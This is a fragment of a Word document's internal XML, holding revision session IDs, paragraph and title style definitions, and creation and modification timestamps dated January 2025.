    <w:rsid w:val="002E27B9"/>
    <w:rsid w:val="002F1598"/>
    <w:rsid w:val="002F2101"/>
    <w:rsid w:val="00310518"/>
    <w:rsid w:val="003529B3"/>
    <w:rsid w:val="003B6C77"/>
    <w:rsid w:val="005D28D4"/>
    <w:rsid w:val="00687664"/>
    <w:rsid w:val="006C450B"/>
    <w:rsid w:val="006F6CC2"/>
    <w:rsid w:val="007230B1"/>
    <w:rsid w:val="00786029"/>
    <w:rsid w:val="007A2D32"/>
    <w:rsid w:val="00856B2F"/>
    <w:rsid w:val="00870FC5"/>
    <w:rsid w:val="00947346"/>
    <w:rsid w:val="00A80869"/>
    <w:rsid w:val="00AC6F6C"/>
    <w:rsid w:val="00B13489"/>
    <w:rsid w:val="00B64045"/>
    <w:rsid w:val="00C17412"/>
    <w:rsid w:val="00C60D38"/>
    <w:rsid w:val="00DA21E1"/>
    <w:rsid w:val="00E0277C"/>
    <w:rsid w:val="00E83062"/>
    <w:rsid w:val="00EA0F58"/>
    <w:rsid w:val="00F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4F89"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E671A679-241B-4FC6-9E5F-78082069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38"/>
    <w:pPr>
      <w:spacing w:line="276" w:lineRule="auto"/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D38"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines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3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4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4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4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4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4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48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48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38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38"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:aliases w:val="Heading_3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00C60D38"/>
    <w:pPr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aliases w:val="Heading_3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="00C60D38"/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489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489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489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489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489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489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489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4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489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48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48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4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6C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8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5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4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6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7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3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6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0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9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2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1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34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5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3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0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6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1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5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9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3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83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3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9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6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5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3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7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6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0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6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8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5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6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66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10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-02T10:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-02T10:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>